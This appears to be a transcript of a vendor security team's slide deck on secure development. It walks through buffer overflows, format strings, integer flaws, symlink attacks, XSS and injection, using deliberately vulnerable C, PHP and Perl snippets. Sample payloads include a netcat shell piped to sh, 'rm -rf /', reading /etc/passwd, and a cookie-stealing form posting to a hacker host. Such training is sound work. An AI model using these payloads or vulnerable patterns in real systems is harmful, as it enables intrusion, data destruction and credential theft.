secure product development how to avoid being 0wnz0r3d by
TRANSCRIPT
Secure Product Development
How to avoid being 0wnz0r3d by 31337 h4x04z.
Security Team Introduction Part of service group Respond to NetScreen product flaws Audit security of NetScreen products Provide security knowledge to R&D Create/maintain IDP signatures Create/maintain hardened OS images
Why Worry About Security?
We sell a security product Embarrassment Loss of revenue Patch releases are inefficient Save Security Team work
Why Security Flaws Exist
Security is hard! Lack of education Lack of priority/schedule No liability laws (yet) C, the cursed language
Designing a Secure Product
Security from the beginning Clear security requirements Multiple layers of security Review issues in similar products Allow time for security
Developing a Secure Product
Training/experience Think like a hacker Never ever trust input Check data obsessively Code reviews
Testing a secure Product
Allocate time for security testing Be mean (breaking things is your job) Think like a hacker Test for common flaws
Common Flaws - BOFs
Buffer overflow Most common serious flaw Mostly problem in C libc functions usually at fault
Buffer Overflows - Cont. Text Segment
where executable code is stored
cannot be written to Heap
where malloced memory is located
Stack stores
• local variables• stack frames
grows down
Buffer Overflows - Cont. Stack Frame
Tracks function calls Saved Frame Pointer
• points to the FP of the calling function
Return Address• contains address of code of calling function
• this is the next line-of-code executed after a return statement
Local Variables
Buffer Overflows - Cont. Example of a Stack
Buffer Overflow
void main(int argc, char **argv){ foo(argv[1]);}
void foo(char *str){ int a; char c[16];
strcpy(c, str);
return;}
Buffer Overflows - Cont. Use Example:
# ./program “hello”
Buffer Overflows - Cont. Use Example:
# ./program “AAAAAAAAAAAAAAAAAAAAAAAAAAAA”
(that’s 28 As)
Return Address is now “AAAA” or 0x41414141!
Buffer Overflows - Cont. Use Example:
# ./program “AAAAAAAAAAAAAAAAAAAAAAAA0xc0778012”
Return Address is now 0xc0778012on function return, program starts
executing c[0]Since we control what goes in c[], we
now control the program!
Buffer Overflows - Cont. What can a h4x0r do now?
Crash the machine (DoS) Destroy data (rm -rf /) Install a trojan (subseven, backorifice) Spawn a shell (nc -l -p 5000 | sh)
On a NetScreen? DoS (crash) most common result Overwrite the policy with garbage? Modify the policy to allow access? Execute arbitrary ScreenOS commands?
Buffer Overflows - Cont. Heap overflows Can modify variable values
logged_in = 1 is_superuser = 1
Code execution Harder than stack overflows Only works on some systems Overwrites malloc headers This is a very complex attack
Dangerous libc Functions The worst
strcpy strcat sprintf, vsprintf gets strlen scanf, sscanf, fscanf,
vscanf, vsscanf
Some others realpath getopt getpass streadd strecpy strtms getwd
Format String Flaws Caused by improper use of *printf
functions printf(str) instead of printf(“%s”, str)
%n argument writes to stack Use field widths to increase value (e.g.
%100d) Use multiple %n (one for each byte)
Format String Exampleint main(int argc, char **argv){ char str[256];
scanf(“%256s”, str); //look ma, no overflow! printf(str);}
# ./programAAAA%08x%08x%08x%08x%08x%n
We’ve overwritten memory @ 0x41414141. Replace AAAA with your return address, or any other data structure location
Format Strings - Cont.
What can a hacker do now? Take control of program (overwrite return
address) Dump memory using %s or %x Modify arbitrary data structures
• logged_in = 1 Crash the program (write to bogus address,
SEGFAULT)
Format Strings - Cont. Dangerous functions
• fprintf• printf• sprintf• snprintf• vfprintf• vsprintf• vsnprintf• syslog• others (err*, verr*, warn*, vwarn*)• your own logging functions
Integer Flaws
Even integer math can contain flaws Sign mistakes Integer overflows
Integer Sign Flaws
Relatively common Have to check function prototypes (unsigned int)-1 = 4,294,967,295 Hard to exploit Apache chunked encoding vulnerability
Integer Sign Flaw - Examplevoid foo(int len, char *src){ buf[256]; if(len > 256) { //no overflows allowed! printf(“error!”); return; }
memcpy(buf, src, len); printf(“ok!”);}
foo(7, “hello”); -- ok!foo(500, ...); -- error!foo(-1, ...); -- SEGFAULT
Integer Overflows
What happens when an int gets too big? 4,294,967,295 + 1 = 0 All integer math is mod 2^32 No way to tell this has happened
Integer Overflow Exampleint* arraydup(int *array, unsigned int n){
int *newarray = malloc(n * sizeof(int));
int i;
for(i = 0; i < n; i++){
newarray[i] = array[i];
}
return newarray;
}
if n = 1073741824, n * sizeof(int) = 4294967296 = 0
Integer Overflow Example(2)char *strcat(char *str1, uint len1, char *str2, uint
len2)
{
char *newstr = malloc(len1 + len2);
memcpy(newstr, str1, len1);
memcpy(newstr + len1, str2, len2);
return newstr;
}
if len1 = len2 = 0x80000000, len1 + len2 = 0x0100000000 = 0
result: SEGFAULT
/tmp Attacks
Can happen when filename is predictable Attacker can symlink file to anything Not just /tmp Solution: use tempnam, etc.
/tmp Attacks - Examplevoid main(){ int fd = creat(“/tmp/foo”, O_RDRW);
write_temp_data(fd);}
Attacker can symlink /tmp/foo to some other file owned by the process UID. You’re not root are you?
/etc/passwd/var/firewall/policy.txt
if attacker can control what is written, could be even worse attack
Cross-Site Scripting HTML/javascript attack Way to trick other users Can Occur whenever user-provided data
is displayed (NetScreen FW Logs) Very difficult to block, script can be
entered many ways Only allow good characters, don’t try to
block bad
Cross-Site Scripting - Example<?php
print “Welcome $username\n”;
?>
What if username was:
<form action=www.hacker.com/gather.cgi><input type=hidden name=cookie onLoad=“value=document.cookie; form.submit();”></form>victim
Victim would see “Welcome victim!” but their cookie was just stolen.
Can be made less conspicuous by using URL encodings, e.g.:
/login.php?username=<form...
can look like:
/login.php?%75%73%65%72%6e%61%6d%65%3d%3c%66%6f%72%6d...
Command/SQL Injection
Can occur whenever commands are executed
Also in all SQL statements Prematurely end statement, add 2nd
statement Don’t filter out bad characters, only allow
good characters
Command Injection - Example#!/bin/perl
#Web-based finger gateway
$user = $form[user];
@output = `/bin/finger $user`;
print @output;
What if $form[user] was “foo; rm -rf /” or “foo; cat /etc/passwd”?
The ‘;’ terminates the 1st command, begins 2nd command.
Not only ‘;’, some shells allow &&, ||, etc.
SQL Injection - Examplevoid insert_log(char *user, char *log){
db->insert(“insert into log values(%s, %s)”, user, log);
}
What if log was: “executed command: foo); truncate table log;”
(presumably the attacker typed “foo); truncate table log;” at the prompt
or this: “update userdb set password=$passwd where user=$user;”
What if $user was “attacker or user like ‘admin’”
The attacker just set the admin’s password!
Summary
Plan for security Always keep security in mind For developers:
Never trust input Check everything Only allow valid data Be familiar with common security flaws
Thank You
You’ve just made our job easier.